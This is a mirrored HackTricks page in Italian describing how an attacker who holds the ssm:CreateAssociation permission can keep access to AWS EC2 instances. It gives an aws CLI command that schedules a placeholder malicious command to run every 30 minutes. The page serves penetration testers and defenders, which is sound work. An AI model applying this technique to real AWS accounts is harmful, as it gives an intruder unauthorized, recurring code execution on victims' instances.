gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-01 07:25:51 -08:00
Code Issues Packages Projects Releases Wiki Activity
Files
11925ac932d9edabf9b20ce2a0580d5dfb8027bd
hacktricks-cloud/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence/README.md

1.4 KiB
Raw Blame History

AWS - SSM Persistenza

{{#include ../../../../banners/hacktricks-training.md}}

SSM

Per maggiori informazioni consulta:

{{#ref}} ../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md {{#endref}}

Utilizzo di ssm:CreateAssociation per la persistenza

Un attaccante con il permesso ssm:CreateAssociation può creare una State Manager Association per eseguire automaticamente comandi su istanze EC2 gestite da SSM. Queste State Manager Association possono essere configurate per essere eseguite a intervalli fissi, rendendole adatte per una persistenza simile a backdoor senza sessioni interattive.

aws ssm create-association \
--name SSM-Document-Name \
--targets Key=InstanceIds,Values=target-instance-id \
--parameters commands=["malicious-command"] \
--schedule-expression "rate(30 minutes)" \
--association-name association-name

Note

Questo metodo di persistence funziona fintanto che l'istanza EC2 è gestita da Systems Manager, l'SSM agent è in esecuzione, e l'attaccante ha il permesso di creare associations. Non richiede sessioni interattive o permessi espliciti ssm:SendCommand. Importante: Il parametro --schedule-expression (es. rate(30 minutes)) deve rispettare l'intervallo minimo di 30 minuti di AWS. Per esecuzione immediata o una tantum, omettere completamente --schedule-expression — l'association verrà eseguita una volta dopo la creazione.

{{#include ../../../../banners/hacktricks-training.md}}

Reference in New Issue View Git Blame Copy Permalink